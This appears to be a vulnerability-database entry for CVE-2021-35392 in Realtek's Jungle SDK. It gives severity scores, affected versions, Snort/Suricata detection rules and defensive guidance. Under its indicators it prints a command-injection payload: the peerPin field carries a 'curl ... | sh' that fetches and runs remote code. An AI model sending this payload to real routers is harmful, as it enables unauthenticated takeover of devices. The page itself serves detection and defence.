CVE-2021-35392
published 2021-08-16CVE-2021-35392: Realtek Jungle SDK version v2.x up to v3.4.14B provides a 'WiFi Simple Config' server that implements both UPnP and SSDP protocols. The binary is usually named…
PriorityP270high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
83.15%
99.6th percentile
Realtek Jungle SDK version v2.x up to v3.4.14B provides a 'WiFi Simple Config' server that implements both UPnP and SSDP protocols. The binary is usually named wscd or mini_upnpd and is the successor to miniigd. The server is vulnerable to a heap buffer overflow that is present due to unsafe crafting of SSDP NOTIFY messages from received M-SEARCH messages ST header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realtek | rtl819x_jungle_software_development_kit | 2.0 – 3.4.14b | — |
Detection & IOCsextracted from sources · hover to see the quote
url/goform/formWsc
path/goform/formWsc
commandsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/"; pcre:"/^form(RebootCheck|Wsc)$/R"; http.request_body; content:"submit-url="; fast_pattern; isdataat:2000,relative; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35392; classtype:attempted-user; sid:2033837; rev:1; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35392, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2023_04_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →Exploit targets the 'formWsc' page via HTTP POST to /goform/formWsc; injection occurs in the 'peerPin' parameter. Look for semicolons or shell metacharacters in the peerPin field.
- →The Snort/ET rule triggers on HTTP POST to /goform/formRebootCheck or /goform/formWsc with a request body containing 'submit-url=' and a body length exceeding 2000 bytes (isdataat:2000,relative), indicating an oversized/malicious payload.
- →The vulnerable binaries are named 'wscd' or 'mini_upnpd'. Monitor for these processes handling crafted SSDP NOTIFY/M-SEARCH messages on the network. ↗
- →The heap buffer overflow is triggered via crafted SSDP NOTIFY messages derived from received M-SEARCH ST headers. Monitor SSDP traffic for anomalously large or malformed ST header values. ↗
- →Nuclei template uses an OOB interaction check: a successful exploit causes the target to issue an outbound HTTP request with 'User-Agent: curl', which can be detected on egress or via canary/interactsh infrastructure.
- ·The Nuclei template is tagged CVE-2021-35395 (command injection) but is included in sources for CVE-2021-35392 (heap buffer overflow). The two CVEs are distinct vulnerabilities in the same SDK; ensure detections are applied to the correct CVE.
- ·The ET Snort rule (sid:2033837) covers both formRebootCheck and formWsc endpoints under CVE-2021-35392, so it may fire on either endpoint; tune accordingly to avoid false positives from legitimate WPS configuration traffic.
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:N/I:N/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)
suricata·2021-08-30·CVSS 7.5
CVE-2021-35392 [HIGH] ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)
ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/"; pcre:"/^form(RebootCheck|Wsc)$/R"; http.request_body; content:"submit-url="; fast_pattern; isdataat:2000,relative; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35392; classtype:attempted-user; sid:2033837; rev:1; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35392, deployment Perimeter, deployment Internal, confidence Medium, signature_severi
Nuclei
RealTek Jungle SDK - Arbitrary Command Injection
nuclei·CVSS 7.5
CVE-2021-35395 [HIGH] RealTek Jungle SDK - Arbitrary Command Injection
RealTek Jungle SDK - Arbitrary Command Injection
There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
Template:
id: CVE-2021-35395
info:
name: RealTek Jungle SDK - Arbitrary Command Injection
author: king-alexander
severity: critical
description: |
There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
impact: |
Unauthenticated attackers can execute arbitrary system commands via command injection in the peerPin parameter, leading to complete router compromise and contro
No writeups or analysis indexed.
https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chainhttps://www.realtek.com/en/cu-1-en/cu-1-taiwan-enhttps://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdfhttps://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chainhttps://www.realtek.com/en/cu-1-en/cu-1-taiwan-enhttps://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf
2021-08-16
Published